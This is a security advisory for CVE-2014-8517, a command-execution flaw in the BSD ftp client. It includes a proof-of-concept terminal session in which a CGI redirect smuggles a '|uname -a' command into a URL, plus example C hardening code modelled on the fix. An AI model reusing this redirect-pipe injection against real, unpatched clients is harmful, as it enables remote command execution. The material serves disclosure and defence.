“CVE-2014-8517” vulnerability: Remote command execution in FreeBSD

FreeBSD developers have published an advisory announcing the fix for a vulnerability in FreeBSD.

Exploitation of the vulnerability allows execution of arbitrary commands, access to sensitive information, and denial of service on the affected machine. A malicious HTTP server could cause ftp to execute arbitrary commands.

Danger level: High

Availability fixes: Yes

Number of vulnerabilities: 1

CVSSv2 Rating: (AV:N/AC:M/Au:N/C:C/I:C/A:C/E:U/RL:O/RC:C) = Base: 9.3 / Temporal: 6.9

CVE ID: CVE-2014-8517

Attack vector: Remote

Impact: Remote command execution

Affected Products: FreeBSD 9.x, FreeBSD 10.x

Affected versions: FreeBSD 9.x (all supported versions), FreeBSD 10.x (all supported versions)

Description:

[CVE-2014-8517] – a dangerous vulnerability in the ftp(1) client that allows an attacker controlling an HTTP server to make the ftp utility execute arbitrary commands on the victim's computer.

The vulnerability is caused by an error in the function fetch_url() in the source file /src/usr.bin/ftp/fetch.c when processing URLs. A remote attacker can execute arbitrary code on the target system.

Demonstration of the attack (terminal session from the original report):

a20$ pwd
/var/www/cgi-bin
a20$ ls -l
total 4
-rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect
-rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a
a20$ cat redirect
#!/bin/sh
echo 'Status: 302 Found'
echo 'Content-Type: text/html'
echo 'Connection: keep-alive'
echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
echo
a20$
a20$ ftp http://localhost/cgi-bin/redirect
Trying ::1:80 ...
ftp: Can't connect to `::1:80': Connection refused
Trying 127.0.0.1:80 ...
Requesting http://localhost/cgi-bin/redirect
Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
Requesting http://192.168.2.19/cgi-bin/|uname%20-a
32        101.46 KiB/s
32 bytes retrieved in 00:00 (78.51 KiB/s)
NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36 ADT 2014  Jared@Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIEBOARD evbarm
a20$
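To make the mechanism concrete, here is an added C example (not code from the FreeBSD or NetBSD ftp sources) that models the vulnerable step shown in the session above: when the user gives no output file, the client derives its local save name from the last component of the final (post-redirect) URL, and the output-file code treats a name beginning with '|' as a command to pipe data into. The hardened choose_savefile() below, modelled on the shape of the vendor fix, refuses a server-derived name that starts with '|' while leaving an explicitly user-supplied output name untouched. The function names, the enum, and the simplified URL and percent-decoding handling are assumptions of this example; the real client does considerably more.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example (not from the ftp sources): how a save file name is derived
 * from a URL path and why a leading '|' must be refused when the name comes
 * from the server rather than from the user. */

/* Result of deciding where fetched data goes. */
enum savefile_status {
    SAVE_OK = 0,            /* out holds a usable file name */
    SAVE_REFUSED_PIPE = -1, /* server-derived name started with '|' */
    SAVE_EMPTY = -2         /* URL path ended in '/', nothing to save as */
};

/* Percent-decode src into dst (hypothetical helper; %XX -> byte). */
static void url_decode(const char *src, char *dst, size_t dstlen)
{
    size_t o = 0;
    for (size_t i = 0; src[i] != '\0' && o + 1 < dstlen; i++) {
        if (src[i] == '%' && isxdigit((unsigned char)src[i + 1]) &&
            isxdigit((unsigned char)src[i + 2])) {
            char hex[3] = { src[i + 1], src[i + 2], '\0' };
            dst[o++] = (char)strtol(hex, NULL, 16);
            i += 2;
        } else {
            dst[o++] = src[i];
        }
    }
    dst[o] = '\0';
}

/*
 * Decide the local save file for a fetch of url_path (everything after the
 * host). If the user passed an explicit outfile, it wins unchanged: a leading
 * '|' there is the user's deliberate choice. Otherwise the name is the
 * percent-decoded last path component, which an attacker controls through
 * an HTTP redirect, so it must never be interpreted as a command.
 * Returns SAVE_OK with out filled in, or a negative status with out empty.
 */
enum savefile_status choose_savefile(const char *url_path, const char *outfile,
                                     char *out, size_t outlen)
{
    out[0] = '\0';
    if (outfile != NULL) {
        snprintf(out, outlen, "%s", outfile);
        return SAVE_OK;
    }
    const char *slash = strrchr(url_path, '/');
    const char *base = slash ? slash + 1 : url_path;
    char decoded[256];
    url_decode(base, decoded, sizeof decoded);
    if (decoded[0] == '\0')
        return SAVE_EMPTY;
    /* The hardening: a server-controlled name must not start with '|'.
     * An unpatched client would hand decoded + 1 to popen(3) here. */
    if (decoded[0] == '|')
        return SAVE_REFUSED_PIPE;
    snprintf(out, outlen, "%s", decoded);
    return SAVE_OK;
}

int main(void)
{
    /* Constructed inputs: the redirect target from the session above,
     * the same path with the pipe percent-encoded, and a benign path. */
    const char *paths[] = { "/cgi-bin/|uname%20-a", "/cgi-bin/%7Cuname%20-a",
                            "/cgi-bin/redirect" };
    for (size_t i = 0; i < sizeof paths / sizeof paths[0]; i++) {
        char name[256];
        enum savefile_status st = choose_savefile(paths[i], NULL, name, sizeof name);
        printf("%-28s -> status %d, save as \"%s\"\n", paths[i], (int)st, name);
    }
    return 0;
}
```

The check is applied only to names the client invented from the URL; an output name given on the command line is trusted because the user chose it, which is the distinction that makes the fix narrow enough not to break the documented pipe feature.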

The vulnerability is present in all current versions of FreeBSD. A similar problem exists in the NetBSD ftp client, and it is possibly present in other BSD systems.

Solution: Install the vendor update.

References:

https://lists.freebsd.org/pipermail/freebsd-announce/2014-November/001601.html

Vendor URL: http://www.freebsd.org/